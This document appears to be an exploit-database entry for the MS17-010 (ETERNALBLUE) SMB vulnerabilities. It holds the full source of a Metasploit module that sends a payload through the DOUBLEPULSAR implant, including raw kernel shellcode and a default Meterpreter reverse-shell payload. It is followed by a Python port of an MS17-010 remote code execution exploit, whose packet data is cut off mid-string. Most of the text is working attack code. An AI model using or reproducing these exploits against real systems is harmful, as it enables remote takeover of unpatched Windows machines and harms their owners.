From the shadowbroker, Windows XP to Windows 2012 SMB remote code execution vulnerability, corresponding to the number ETERNALBLUE it.
* [CVE-2017-0143](<http://cvedetails.com/cve/cve-2017-0143>)
* [CVE-2017-0144](<http://cvedetails.com/cve/cve-2017-0144>)
* [CVE-2017-0145](<http://cvedetails.com/cve/cve-2017-0145>)
* [CVE-2017-0146](<http://cvedetails.com/cve/cve-2017-0146>)
* [CVE-2017-0147](<http://cvedetails.com/cve/cve-2017-0147>)
* [CVE-2017-0148](<http://cvedetails.com/cve/cve-2017-0148>)
Reference: https://github.com/misterch0c/shadowbroker/blob/master/windows/specials/
{"zdt": [{"lastseen": "2021-12-21T03:24:42", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-04T00:00:00", "type": "zdt", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "modified": "2019-10-04T00:00:00", "id": "1337DAY-ID-33313", "href": "https://0day.today/exploit/description/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/33313", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-03-19T02:05:14", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "zdt", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-05-10T00:00:00", "id": "1337DAY-ID-27752", "href": "https://0day.today/exploit/description/27752", "sourceData": "# Exploit Author: Juan Sacco\r\n# MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\r\n# Tested on: Microsoft Windows Server 2008 x64 SP1 R2 Standard \r\n#\r\n# Description: SMBv1 SrvOs2FeaToNt OOB is prone to a remote code execution\r\n# vulnerability because the application fails to perform adequate\r\n# boundary-checks on user-supplied input. Srv.sys process SrvOs2FeaListSizeToNt \r\n# and when the logic is not correct it leads to a cross-border copy. The vulnerability trigger point is as follows:\r\n#\r\n# Vulnerable code:\r\n# unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)\r\n# {\r\n# int v4; // [email\u00a0protected]\r\n# _BYTE *v5; // [email\u00a0protected]\r\n# unsigned int result; // [email\u00a0protected]\r\n# \r\n# v4 = a1 + 8;\r\n# *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;\r\n# *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);\r\n# *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);\r\n# _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));\r\n# v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);\r\n# *v5++ = 0;\r\n# _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));\r\n# result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;\r\n# *(_DWORD *)a1 = result - a1;\r\n# return result;\r\n# }\r\n#\r\n# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the\r\n# context of the application. Failed exploit attempts could result in a\r\n# denial-of-service condition.\r\n#\r\n# Timeline:\r\n# 04/05/2017 - Research started\r\n# 04/05/2017 - First PoC using original code\r\n# 05/05/2017 - Kernel debugging on Windows 2008\r\n# 05/05/2017 - Exploit code first draft\r\n# 06/05/2017 - Functional PoC\r\n# 07/05/2017 - Added support for Zerosum0x0 shellcode\r\n# 08/05/2017 - Code revisited and bugs fixed\r\n# 09/05/2017 - First successful shell\r\n# 09/05/2017 - Exploit tested in QA Laba\r\n# 09/05/2017 - Exploit code final review\r\n# 09/05/2017 - Publish\r\n#\r\n# Vendor homepage: http://www.microsoft.com\r\n# This exploit is a port from the amazing work made by Risksense. Checkout the original project at: https://github.com/RiskSense-Ops/MS17-010\r\n# Credits: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco \r\n#\r\n# How to run: python3 ms17010.py ipaddress\r\n#\r\nimport sys\r\nimport socket\r\nimport time\r\nimport ast\r\nimport binascii\r\nimport os\r\n \r\ndef mod_replay():\r\n datfile = [\"('connect', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00\\\\x88\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\r\\\\xff\\\\x00\\\\x88\\\\x00\\\\x04\\\\x11\\\\n\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xd4\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x002\\\\x001\\\\x009\\\\x005\\\\x00\\\\x00\\\\x00W\\\\x00i\\\\x00n\\\\x00d\\\\x00o\\\\x00w\\\\x00s\\\\x00 \\\\x002\\\\x000\\\\x000\\\\x000\\\\x00 \\\\x005\\\\x00.\\\\x000\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 'userid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00X\\\\xffSMBu\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x04\\\\xff\\\\x00X\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00-\\\\x00\\\\x00\\\\\\\\\\\\x00\\\\\\\\\\\\x001\\\\x007\\\\x002\\\\x00.\\\\x001\\\\x006\\\\x00.\\\\x009\\\\x009\\\\x00.\\\\x005\\\\x00\\\\\\\\\\\\x00I\\\\x00P\\\\x00C\\\\x00$\\\\x00\\\\x00\\\\x00?????\\\\x00', 0.0)\", \"('recv', 1, 'treeid', 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x048\\\\xffSMB\\\\xa0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x14\\\\x01\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x01\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00h\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\xec\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\